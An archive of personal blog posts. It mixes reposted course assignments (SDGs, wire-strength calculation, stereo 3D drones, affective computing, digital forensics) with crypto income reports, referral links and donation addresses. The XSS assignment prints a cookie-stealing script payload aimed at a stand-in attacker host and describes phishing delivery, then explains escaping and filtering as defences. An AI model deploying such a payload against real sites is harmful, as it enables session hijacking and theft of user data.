February 27, 2021

My Thought of How to Contribute to Sustainable Development Goals When I was a Young Student


seventeen points of SDG
This is my doctoral assignment from the International Cooperation for Sustainable Development Goals Short Course, which has never been published anywhere. I, as the author and copyright holder, license this assignment under a customized CC-BY-SA where anyone can share, copy, republish, and sell it on condition that they state my name as the author and note that the original and open version is available here. It is unfortunate that I have to go back on my words due to private circumstances and the Covid-19 pandemic. Another factor is myself, as I changed. Back then, I was fully into academia and research, and I met a friend who did postdocs in many countries, who was my inspiration. I have changed ever since I was exposed to finance, entrepreneurship, investment, and cryptocurrency.

1. Cooperation for Sustainable Development Goals

five Ps
Cooperation (sometimes written as co-operation) is the process of groups of organisms working or acting together for common or mutual benefit, as opposed to working in competition for selfish benefit [1]. In other words, cooperation is the process of jointly working towards the same end with another person agreeably and willingly. International cooperation represents various nations in the pursuit of a common goal or interest. The goal of international cooperation is usually the sustainable development goals (SDG). Sustainable development is development that meets the needs of the present without compromising the ability of future generations to meet their own needs. The featured image shows the seventeen points of the SDG and the image above shows the five Ps, which influence and are related to one another. All these factors have to be considered. [2]

2. Plans for Contribution

Although there are many points shown in the images above, there are only a few to which I plan to contribute directly, which will hopefully also have a positive impact on the other points. There are five points to which I can directly contribute:

  1. Quality Education
  2. Reducing Inequality
  3. Partnership for the Goals
  4. Industry, Innovation, and Infrastructure
  5. Affordable and Clean Energy.

There are many types of contributions that I can make, but my biggest plan is to travel to as many countries as I can after I finish and to establish relationships. That way I can have more links for cooperation, collaboration, etc., and more choices will be available. I have experienced that there are complex problems which often need outside-the-box concepts to solve. Having people experience more of other parts of the world, and inviting people from other parts of the world, increases the chance of finding solutions with outside-the-box concepts. I said to the people in my country that I would like to build the country from outside by establishing links with people from other countries, so that they can become interested in the country and contribute their creative and innovative ideas to it. In return they may also gain benefits, and we may do the same for other countries.

Types of contributions:

  • Contribution through professional activities: I will try to host or join exchange programs, because I believe that these kinds of programs can widen people’s perspectives. For example, in my country people know that throwing garbage randomly is not a good thing but they still do it, because they lack the experience of being in a developed country and so cannot visualize the seriousness. Other things that I will do are to join conferences, give guest lectures, join workshops, or become a reviewer. I also have much experience in distance learning, which I aim to use to build a good computer-based system for better and more equal quality education.
  • Contribution as a community member: I don’t really have much to say about being a community member, but I would like to be a bridge from one community to another.
  • Sustainable cooperation with universities/researchers (supervisors): even here in my current university, alumni from other countries are invited at least once a year for discussion with the current students and members here. Next time it will probably be me who is invited. The reverse applies as well. I will also encourage students to continue their studies abroad or join exchange programs.
  • Sustainable cooperation with colleagues in the region and all over the world: I keep in contact with the friends from all over the world that I have met here, and I plan to visit their countries someday, hoping that we can collaborate. The collaboration can be in any country, by examining its issues and seeing if we can implement a solution from more developed countries. For example, in some places infrastructure is still too poor to conduct even computer-based education. Therefore we should invest in single-board computers to be used in these rural areas, because they are low in energy consumption and price, and they are independent of infrastructure because they run on simple batteries. At the very least, we can also collaborate remotely through social media, whether by forums or video conferences; for example, in my field of computing we can collaborate remotely on making programs or systems together even though we are far away from each other. After that we can coauthor papers and patents.

3. Reference

  1. https://en.wikipedia.org/wiki/Cooperation
  2. K. Nakano, “International Cooperation And SDGs No One Should Be Left Behind.”, Supplied Course Material, 13-03-2018.
  3. https://i0.wp.com/www.un.org/sustainabledevelopment/wp-content/uploads/2017/12/E_2018_SDG_Poster_with_UN_emblem.png?resize=600%2C464
  4. http://www.oneworldcentre.org.au/wp/wp-content/uploads/2017/08/5-Ps-sustainability-1.png


February 17, 2021

Metal Wire Strength Calculation Object Lifting Assignment


This is one of my doctoral assignments from the Current Science and Technology in Japan course, which has never been published anywhere. I, as the author and copyright holder, license this assignment under a customized CC-BY-SA where anyone can share, copy, republish, and sell it on condition that they state my name as the author and note that the original and open version is available here.

1. Why do we need high strength metals for making a new car?

  • To protect the driver and passengers from external force (safety).
  • To reduce the weight of the car (light weight).
  • To maintain the form of the car, for example there are mechanics and engines that produce heat.
  • The car must be strong enough to handle its internal force.

2. You are going to pick up “Treasure box (500 kg)” at the bottom of a deep hole (5000 m in depth). You have a long steel wire with 30 kg/mm² of strength, 5 mm of diameter and 10000 m of length. Can you pick up the box, or not? (If you couldn’t pick it up by using the steel wire, what type of wire would you get to pick up the box?)

wire strength calculation treasure lifting illustration
  • Load = 500kg
  • Rope = 10000m
  • Depth = 5000m
  • Number of ropes available = absolute(Rope/Depth) = abs(10000 m / 5000 m) = 2: we can use 2 ropes of 5000 m
  • Rope diameter = 5 mm
  • Section area = πd²/4 = 3.14 × 25 / 4 mm² = 19.64 mm²
  • Total section area of 2 ropes = 19.64 mm² + 19.64 mm² = 39.28 mm²
  • Stress = Load / Total section area = 500 kg / 39.28 mm² = 12.73 kg/mm²
  • 2 Steel Wire Strength > Stress, 30 kg/mm² > 12.73 kg/mm²: TRUE
  • Answer: yes, the available steel wire is able to retrieve the treasure.


February 16, 2021

The Stereo 3D on Future Drones


This is one of my Masters assignments from the Media Information Processing course, which has never been published anywhere. I, as the author and copyright holder, license this assignment under a customized CC-BY-SA where anyone can share, copy, republish, and sell it on condition that they state my name as the author and note that the original and open version is available here.

1. Stereoscopic 3D 2 camera

The explanation in this first section is from [1]. Stereoscopic 3D is a method of making a 3D visual representation of an image using 2 cameras. Stereo refers to “2” and 3D is 3 dimensions. The concept is based on how our eyes perceive the visual aspect of the world, as in Figure 1. We can first implement it by creating an image with a digital camera; video representation is then possible as long as the same method is applied. The result will be as in Figure 2, where the top is the 2 images and the bottom is how we will perceive them.

There are a few terms that might be unfamiliar. Interocular separation is the distance between the centers of the human eyes, which is around 65mm for male adults. Interaxial separation is the distance between the 2 lenses of the camera. It is not recommended to regard interaxial separation as the same as interocular separation, but interocular separation is used to calculate interaxial separation.

Figure 1. How our eyes see and how to implement

Returning to Figure 1, we see that we use binocular vision (“bi” means two), where our vision system uses two eyes. We and other mammals commonly use it to see the depth of an object, or how far away the object is. When we look at an object from a distance, the image is projected at slightly different locations on our 2 retinas, and our brain interprets this as retinal disparity. The same thing happens if we use two cameras: the image is registered at slightly different horizontal positions, which is called parallax. Another thing we can see in Figure 1 is that our eyes converge when we focus on a certain object; the closer the object in focus, the more they converge (Figure 1 shows converging eyes). If the object moves further away, our eyes instead tend to diverge more. For example, when we focus on a cup we see one image of the cup (actually it is two images but we perceive them as one), and if we focus on the wall behind it instead we see two cups.

Figure 2. Perception in Stereo3D

Figure 2 is just an illustration of how we emulate binocular vision on a screen. We will perceive either positive parallax, where the red triangle appears to be behind the window, or negative parallax, where the green square seems to be in front of the window. Our brains perceive it that way, and some may call it an illusion.

2. Stereoscopic 3D 1 camera

Producing this still requires 2 images that fulfill the requirement. It is possible to do this with just one camera, as in Figure 3 where a person takes two pictures. [2]

Figure 3. Using one camera

When using a drone we simply have to apply a control system so that the drone captures 2 separate images that fulfill the requirement. A control system may be applied to compute where to take the left image and the right image: compute the distance to the object, then find the angle and distance for the left image and the right image.

Figure 4. Camera equipped with mirror

For video a more complex method is needed. There is one in [3] that claims it is possible using mirrors and prisms, as in Figure 4. Another method is progressive image capturing, where the camera shifts left and right [4]. It quickly captures an image when shifted to the left and when shifted to the right, and the shifting process itself is very quick. An enhanced method is to use high-frequency shifting while recording video, as in the example in Figure 5 [5]. The video is then processed to cancel the vibration and shaking [6].

Figure 5. Camera on drone shifts left and right

3. Reference

  1. http://www.dashwood3d.com/blog/beginners-guide-to-shooting-stereoscopic-3d/
  2. https://adcnj3d.wordpress.com/shooting-3d-with-one-camera/
  3. https://www.lhup.edu/~dsimanek/3d/stereo/3dgallery16.htm
  4. https://en.wikipedia.org/wiki/Stereo_camera#Types_of_stereo_cameras
  5. http://www.stereofpv.com/
  6. https://helpx.adobe.com/photoshop/using/reduce-camera-shake-induced-blurring.html


My opinion on affective media and wearables paper when I was a young student

information media perception and emotion illustration

This is one of my Masters assignments from the Media Information Processing course, which has never been published anywhere. I, as the author and copyright holder, license this assignment under a customized CC-BY-SA where anyone can share, copy, republish, and sell it on condition that they state my name as the author and note that the original and open version is available here.

My opinion and thoughts on Prof. Rosalind Picard's paper, "Affective media and wearables: surprising findings", are written as follows. First, there is a similarity with my human interface lab, where we develop technology always keeping in mind that the final receiver is always us “human beings”. Also, as I am in the e-learning group, most of the evaluations are based on the users, whether their emotion, performance, etc. Prof. Rosalind Picard started a new research field in affective computing. The background of her research group is that most technologies were created without taking emotions into consideration. Maybe back then most of them focused only on the cognition side (a person's ability and processing power) but were lacking on the emotion side (frustration, stress, etc.). Her field of study claims to balance cognition and emotion in developing technologies.

Even before she started the research group she had already suggested that computers need the skills of emotional intelligence for interaction with us “people”. She started by enabling computers to interact with human emotions. Her products can be in the form of wearable sensors, audio and video coupled with signal processing, etc. These products are designed to sense the physical and emotional condition of the user. They then respond to these values, whether the health condition, stress level, or frustration of the users, to ease them; in other words, they are user friendly.

This field needs collaboration with other fields (lots of them) because it includes many different aspects. The starting point is the psychology of human emotions, one of the oldest research fields, because we need to understand human emotions. Up to now I have not heard of a device that can directly identify someone's emotion; instead, devices use the physical phenomena generated by the person, for example body heat, heartbeat, and blood pressure. Sensors are therefore necessary in this field to capture these values, and since most of these sensors are electronic devices, the field of electronics is necessary. The values should then be converted into information readable by people. The next step is to make the device understand a person's emotion. With the data extracted from the user, the device should process it and make a judgment on whether the person is happy, sad, angry, or feeling other emotions. After that the device should react accordingly to these values or give feedback, which those in the field of informatics can do. Once the prototype is finished we need to think about the design. Should we embed pressure sensors in the keyboard and mouse? Should we use a webcam to identify the user's facial expression? Should we attach wearable sensors to the user? We must think of a strategy to apply this without adding discomfort to the user. Once a computer is aware of the person's condition and emotion, it should interact with the person. In what ways can a computer, device, or machine respond to a person's emotion? To answer this question engineers, health physicians, and even psychologists need to collaborate. In the end we strive to make technology that is alive and more understanding.

Another topic is using media to communicate between people. With advances in technology we can use electronic devices to communicate with others over long distances. We can send information via text, but involving emotions in this communication is still under research. The medium that is currently closest to face-to-face communication is video conferencing. The device acts on our behalf by capturing our voice and image and transmitting them far away. By hearing and seeing the person we communicate our feelings or emotions. But the feeling that something is missing is still there. For example, can we comfort a sad person through a video call the same way as we comfort them when they are there? That is another reason why the field of affective computing exists today. Media can mediate information, but it is still a question when emotions are involved.


February 15, 2021

Paid IEEE Membership With Bitcoin Through Vandle Cryptoable Prepaid Visa Card

Vandle Card
Although I call myself self-employed, officially I am unemployed. Especially since the sources of my income are content creation, trading, investing, airdrops, and giveaways, all of them paid in cryptocurrency, almost no banks are willing to issue a credit card to me. While a credit card's original function is to buy now and pay later (credit/debt), it can be the only method of purchase for certain online services. It is good that convenience stores sell vouchers for purchases at Amazon, Google Play, Apple Store, and Microsoft Store. However, certain online services still accept credit cards only.
IEEE payment option
Although there are other options for IEEE membership payments, I cannot pass WeChat and Alipay verification in my region, and yes there is PayPal, but ironically I can only top it up using a credit card in my region. They do provide payment through banks, but not online banking and not direct transfer either; rather it is a process that is complicated for the digital age we are in now, of filling in forms and lining up in a queue, not to mention whether the teller understands this kind of payment.
Vandle Card Top Up Bitcoin
Good thing I applied for and got a prepaid Visa card during my time in Japan that can be topped up with cryptocurrency. The card that I got is the Vandle Card, which currently can be topped up with Bitcoin and the Bitflyer exchange for now. There are also the Crypto.com Card, Binance Card, Coinbase Card, and Plutus Card, but they are unavailable in my region. There is the Ternio Block Card but I have not tried it. The only card I have now is the Vandle Card.
IEEE Payment
I topped up enough to pay for my membership. At first, I tried without topping up and an error occurred. I was hesitant at first but got the courage to top up. Finally, I tried again and the transaction was accepted. As you can see, below the payment history entry IEEE PRODUCTS AND SERVICE is Bitcoin written in Katakana letters, which is a history entry showing that I topped it up with Bitcoin.


February 14, 2021

Torum Crypto Social Media Mobile Website Live

Torum Mobile Website
Previously we could not access Torum in mobile mode and had to switch to desktop mode every time. Less than a week ago, the team finally released the mobile version of the site. Here are some of my screenshots:
front page, menu bar, notification bar
Here is the front page, menu bar, and notification bar.
daily missions, weekly missions, special missions
Here is the mission menu containing daily, weekly, and special missions.
wallet, mission rewards, gifts received
Here is the wallet menu containing mission rewards and gifts received.
mentor, mentees, landers to discover menu
Here is the referral menu containing the mentor and mentee menus and also landers to discover menu.
torum official account
Here is the company menu, for example the Torum official account.
torum clans
Here are the clans showing my level and exp in EKVA.
Finally, the settings menu.
torum ambassador 0fajarpurnama0
I am writing this article as Torum Ambassador @0fajarpurnama0. Even if I were not an ambassador, I would still write this article but on a different time frame, maybe once a month or every three months? I hope to meet you soon on Torum: https://www.torum.com/signup?referral_code=0fajarpurnama0.


February 13, 2021

Torum Crypto Social Media Mobile Website Live

Torum Mobile Website
Previously we could not access Torum in mobile mode and had to switch to desktop mode every time. No more than a week ago, the team finally released the mobile version of the website. Here are some screenshots for me to share:
front page, menu bar, notification bar
Here is the front page, menu bar, and notification bar.
daily missions, weekly missions, special missions
Here is the mission menu containing daily, weekly, special missions.
wallet, mission rewards, gifts received
Here is the wallet menu containing the mission rewards and gifts received.
mentor, mentees, landers to discover menu
Here is the referral menu containing our mentor and mentees and also landers to discover menu.
torum official account
Here is the company menu, for example the Torum official account.
torum clans
Here are the clans showing my level and experience in EKVA.
Finally, the settings menu.
torum ambassador 0fajarpurnama0
I am writing this article as Torum ambassador @0fajarpurnama0. Even if I'm not an ambassador, I will still be writing these articles but with a different time frame, maybe once a month or three months? I hope to see you soon in Torum: https://www.torum.com/signup?referral_code=0fajarpurnama0.


February 12, 2021

My Blogger Income January 2021 Being Lazy but Unexpected

Content Creation



  • LBRY: LBC 2.24 ≈ $0.3


Personal Monetization

Common Tasks



  • Survey, faucet, etc.: $0


Currently the quantity is too much to handle when the value I earned is not much. So I may report this on a separate article.

January 2021 Income ≈ $89.418

Grade: D

Personal Comments

Recently, there are many readers who actively liked and commented my articles on Floyx and Trybe:

  • If you enjoyed my articles, that is great and thank you!
  • If you engage for the missions and rewards, that is fine.
  • If you only enjoyed my crypto articles, then I have to inform you that I will write a much smaller portion of them and a much larger portion of non-crypto articles. So it is okay to unfollow rather than be disappointed.

I did not expect to get $89 this month, as many kept pestering me to enjoy the new year and stop working hard, even though I told them that if I start enjoying myself once, I will not want to work again for a long time. It really did happen: as you can see, I wrote articles about once every 3-4 days, where previously it was at least once every day. I read fiction, watched movies, and played games often this month, and I expected that I would probably reach just $50 this month. Then where did the remaining $39 come from? Compared to previous months, this month's Steem earnings were much higher, where I usually got at most $5. Also, I didn't expect to get a share of the Publish0x writing contest reward, because very few are attracted to my article.


Publish0x Earnings
Publish0x Competition Earnings
Blurt Earnings
Hive Earnings
Steemit Earnings
Aeneas, Leo Finance, and STEM Geeks Earnings
Filearmy Earnings
LBRY Earnings
Coinimp Earnings
Bittube Airtime Earnings
Brave Browser Rewards
Netbox Browser Rewards


Personally, I enjoy being a full-time independent content creator very much, and I once again thank the platforms, investors, donors, and viewers for making my venture possible through donations, tips, and upvotes. If you enjoy and/or want to further support my work, you may choose from more forms of donation:

qr donation
Bitcoin bc1q6hg4lllxthryke7zhxflcdrcm0nr8ph7antxk9, Ethereum 0x3D4c67A2A40bC24ec53ab767b9247c02A2250BCB, Litecoin ltc1qqxl8dng0swv7zuhe30y5kzwht3l25krfaqzu2k, XRP r9rwEdZBWFRbsGzwG5gm1MjDoyBKWLPyx5, Bitcoin Cash qpd74d52rxpt3w70qv555ccq0254j7dhtg2mxst0dc, Binance Chain bnb10hdlv95jyjn92j2l6um6gkmc96a6g57lnezd66, Monero 43V43g1UC9AdgjmjJZPQRxCotyi9VTb8jbYisw2cSqEjbuvp9Y, paypal.me/fajarpurnama.
Animation Source Code


February 11, 2021

My Opinion on Digital Forensic Steps when I was a Young Student

digital forensic steps


This is the fifteenth assignment from my Masters Advanced Network Security course, which has never been published anywhere. I, as the author and copyright holder, license this assignment under a customized CC-BY-SA where anyone can share, copy, republish, and sell it on condition that they state my name as the author and note that the original and open version is available here.

1. What is Digital Forensic?

Digital forensics is a part of forensic science that recovers and investigates material found in digital devices. Digital forensics can be computer forensics, network forensics, forensic data analysis, mobile device forensics, or anything else that involves digital data. It is widely known for gaining evidence from digital data to support the justification of a crime incident, such as finding the information exchanged between suspects over digital media (some call it e-discovery). It is very similar to digital crime investigation (DCI); the distinction is that digital forensics is the process of digging evidence out of a digital device, while DCI is the use of digital devices to help gain evidence of a crime incident. Other than supporting crime investigation, digital forensics is also known for investigating certain events in the digital world. [1]

2. Why Need The Digital Forensic?

Digital technologies are becoming part of our lives, or maybe already are. Every day we use digital devices, and what Hollywood movies showed has become reality: information about individuals, their signatures, and even evidence can be found in digital devices. More than 100 years ago we did not treat blood, fingerprints, and footprints as important evidence, since the science back then could not extract information about an event from them. Today is different: blood and fingerprints can show the individual responsible at a scene. Digital evidence is now following the same trend. By investigating a digital device we can tell who the users are, where they are, and what for and when they used it. [2]

The first section talks about real-world incidents, but incidents also occur in the digital world. The term cyber threat is now well known, covering theft of private information, online fraud, and damage caused by malware. For real-world incidents we intend to find the culprit in order to press charges in court, but in the digital world the question “who” is not as important as “how”. We can find who breached the information security and who created the malware and press charges against them, but if that is all we do, we can expect even more attacks in the future. How the breach occurred and how the malware works are what matter for building a defense mechanism against future attacks. Through digital forensics we obtain this information and apply security based on the threat. [3]

3. How to Perform Digital Forensic?

Generally there are 4 steps [4]:

  1. Seizure: the process of obtaining the devices to be analyzed.
  2. Acquisition: the process of duplicating the information contained on a digital device. In Linux an application called “disk-disk” (dd) can be used, and we must not forget to use hashing such as MD5 to confirm the integrity of the data (to make sure the data was not tampered with). [5]
  3. Analysis: this is the main process for finding evidence and a very specialized field. The original data must not be touched; instead we use the duplicated data from the previous step. Examples are examining the logs, metadata, packets captured with Wireshark, files, directories, etc. Log analysis alone is already a very wide field. [6]
  4. Reporting: the final and decisive step. No matter how skilled we are at gathering digital evidence, it is no use if we cannot write a decent report or present the results well. Tools like EnCase and Forensic Toolkit (FTK) can generate nice reports. [7]
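
Steps 2 and 3 above as an added example (not part of the original assignment): Python code that duplicates a source, hashes the bytes as they are read, re-hashes the written image, and re-checks the working copy before analysis. It defaults to SHA-256 rather than the MD5 named in step 2, because MD5 is no longer collision-resistant (pass `algo="md5"` to reproduce the MD5 check); the function names, the digest record file and the temporary file standing in for a seized disk are assumptions made for the example.

```python
import hashlib
import os
import stat
import tempfile

CHUNK = 1024 * 1024  # bytes read per iteration, so large disks never sit in memory


def file_digest(path, algo="sha256"):
    """Return the hex digest of a file, read in chunks."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def acquire(source, image, algo="sha256"):
    """Duplicate `source` into `image` and prove the copy is bit-identical.

    The source is opened read-only and hashed while it is read; the image is
    then re-read from disk and hashed again. Mode "xb" refuses to overwrite an
    existing image, so an earlier acquisition cannot be clobbered by a rerun.
    """
    h = hashlib.new(algo)
    with open(source, "rb") as src, open(image, "xb") as dst:
        for block in iter(lambda: src.read(CHUNK), b""):
            h.update(block)
            dst.write(block)
        dst.flush()
        os.fsync(dst.fileno())
    source_hash = h.hexdigest()
    if file_digest(image, algo) != source_hash:
        raise IOError("image does not match source: " + image)
    # Record the digest next to the image, in the "<hash>  <name>" layout
    # that md5sum / sha256sum -c can check.
    with open(image + "." + algo, "x") as record:
        record.write("%s  %s\n" % (source_hash, os.path.basename(image)))
    # Drop write permission so analysis works on a read-only copy.
    os.chmod(image, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
    return source_hash


def verify(image, algo="sha256"):
    """Re-hash the working copy and compare with the digest recorded at acquisition."""
    with open(image + "." + algo) as record:
        recorded = record.read().split()[0]
    return file_digest(image, algo) == recorded


if __name__ == "__main__":
    # Constructed stand-in for a seized disk: 3 MiB + 7 bytes of random data.
    workdir = tempfile.mkdtemp()
    disk = os.path.join(workdir, "seized_disk.bin")
    with open(disk, "wb") as f:
        f.write(os.urandom(3 * CHUNK + 7))
    image = os.path.join(workdir, "seized_disk.img")
    print("acquired, sha256 =", acquire(disk, image))
    print("working copy intact before analysis:", verify(image))
```

Calling `verify` again at the start of each analysis session, and quoting the recorded digest in the report, ties every finding back to the acquired image.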

4. Reference

  1. https://en.wikipedia.org/wiki/Digital_forensics
  2. http://ellwoodevidence.com/digital-forensics-why
  3. http://www.darkreading.com/attacks-breaches/why-digital-forensics-in-incident-response-matters-more-now/a/d-id/1318254
  4. https://en.wikipedia.org/wiki/Digital_forensic_process
  5. http://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-using-kali-part-2-acquiring-hard-drive-image-for-analysis-0155533
  6. http://md.kumamoto-u.ac.jp/course/view.php?id=38348
  7. http://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-using-kali-part-1-the-tools-forensic-investigator-0155427


February 10, 2021

My Opinion of XSS/CSS, Digital Forensic, and Digital Crime Investigation when I was a Young Student

featured image


This is the fourteenth assignment from my Masters Advanced Network Security course, which has never been published anywhere. I, as the author and copyright holder, license this assignment under a customized CC-BY-SA where anyone can share, copy, republish, and sell it on condition that they state my name as the author and note that the original and open version is available here.


XSS/CSS stands for cross-site scripting, a computer security vulnerability that allows scripts to be injected into web pages viewed by other users [1]. What is the difference between XSS and code injection? Code injection is a server-side vulnerability while XSS is a client-side vulnerability; what they have in common is that both are injection-type attacks [2]. One of the easiest methods to check for an XSS vulnerability is to include HTML tags in a form submission. For example, Figure 1 shows an <S> (strike-through) HTML tag inserted into a simple PHP form input (any PHP tutorial on the web has this form) and Figure 2 is an example of using the <img src=""> tag to add an image. Even worse, we can input tags that could display the attacker's site instead and take the victim site with <script>document.location="http://some_attacker/cookie.cgi?" + document.cookie</script>. (1) Once an XSS vulnerability has been found, we can send a phishing email containing the XSS script to a user of the site. (2) With good social engineering, the user of the site can be tricked into running the code and connecting to the attacker's site through the XSS-vulnerable site. (3) The attacker can obtain the session ID and other information of the victim. [3]

Figure 1. Checking XSS vulnerability strike through HTML tag example.

To prevent XSS we have to filter the user input. One way is to not allow HTML tags at all, or to perform sanitization that allows text formatting tags such as <B> <U> <I> <S> and converts dangerous characters: “& → &amp;”, “< → &lt;”, “> → &gt;”, “" → &quot;”, “' → &#x27;”, and “/ → &#x2F;”. For my above PHP code I can fix it by changing the output function into “echo htmlspecialchars($string, ENT_QUOTES, 'UTF-8')”. If it is difficult to write our own filter, there are libraries available for filtering XSS such as “PHP AntiXSS”, “xss_clean.php filter”, “htmlpurifier”, “xssprotect”, and “XSS html filter”. [4]

Figure 2. Checking XSS vulnerability image HTML tag example.
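
The filtering described above, as an added example that is not the author's PHP form: a Python implementation of the six-character escape table together with the <B> <U> <I> <S> allow-list, shown next to the vulnerable concatenation it replaces. The function names are hypothetical and the inputs are the strings already quoted in the text.

```python
import re

# Escape table from the paragraph above (the six characters it lists).
ESCAPES = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
    "/": "&#x2F;",
}

# Formatting tags the paragraph allows; tag names are matched case-insensitively.
ALLOWED_TAGS = ("b", "u", "i", "s")

# After escaping, an allowed tag looks like "&lt;s&gt;" or "&lt;&#x2F;s&gt;".
ESCAPED_TAG = re.compile(
    r"&lt;(&#x2F;)?(%s)&gt;" % "|".join(ALLOWED_TAGS), re.IGNORECASE
)


def escape_html(text):
    """Encode every character that can open a tag, attribute or entity."""
    return "".join(ESCAPES.get(ch, ch) for ch in text)


def sanitize(text):
    """Escape everything, then restore only bare allow-listed tags.

    Escaping first means nothing the user typed is markup by default. A tag is
    restored only when it is exactly "<b>", "</b>", and so on; a tag with
    attributes or with any other name stays as inert text. Tag balancing is
    not enforced here.
    """
    def restore(match):
        slash = "/" if match.group(1) else ""
        return "<%s%s>" % (slash, match.group(2).lower())

    return ESCAPED_TAG.sub(restore, escape_html(text))


def render_comment_unsafe(comment):
    """The vulnerable pattern: user input is concatenated into the page as-is."""
    return "<p>" + comment + "</p>"


def render_comment(comment):
    """The hardened pattern: the same page fragment with the input sanitized."""
    return "<p>" + sanitize(comment) + "</p>"


if __name__ == "__main__":
    # Constructed inputs, reusing the strings quoted in the text above.
    samples = [
        "<S>struck</S>",
        '<img src="">',
        '<script>document.location="http://some_attacker/cookie.cgi?"'
        " + document.cookie</script>",
    ]
    for sample in samples:
        print("unsafe:", render_comment_unsafe(sample))
        print("safe:  ", render_comment(sample))
```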

2. Digital Crime Investigation vs Digital Forensic

Digital crime investigation is mainly used in criminal investigation to enhance the investigation process itself. It is more of an auxiliary tool, specifically a digital one. For example: (1) the use of surveillance cameras to capture a robbery incident in a store, (2) categorizing data, clustering data, and plotting graphs, which fall under data mining, (3) using a database to store crime records. Digital forensics, on the other hand, is to extract, collect, analyze, and preserve digital evidence, for example to be shown in court. [5]

Figure 3. Illustration of digital forensic on hardware containing data.

Both digital crime investigation and digital forensics are part of a subject called forensic science. Performing an autopsy on a dead body to find the cause of death is an example of medical forensics. Examining a computer to search for information about an attack on it is an example of digital forensics. The basic steps are to (1) identify the attack, its extent and the damage caused, (2) identify the source of the attack, (3) record the incident. The scope of digital forensics can be computer forensics, as in the example above, or network forensics, which is larger in scale and includes computer forensics. Unlike medical forensics, we can first create a duplicate of the computer data or network data before running digital forensics, which makes it a safe type of investigation that avoids the risk of destroying the evidence. Most commonly examined in digital forensics are maintenance of files and folders, disk logs, server logs, logs from IDS/IPS, and network packets if captured. [5]

3. Reference

  1. https://en.wikipedia.org/wiki/Cross-site_scripting
  2. https://community.rapid7.com/community/nexpose/blog/2013/06/20/xss-vs-injection
  3. http://md.kumamoto-u.ac.jp/mod/book/view.php?id=98590&chapterid=4892
  4. http://resources.infosecinstitute.com/how-to-prevent-cross-site-scripting-attacks
  5. http://md.kumamoto-u.ac.jp/mod/book/view.php?id=98593&chapterid=4897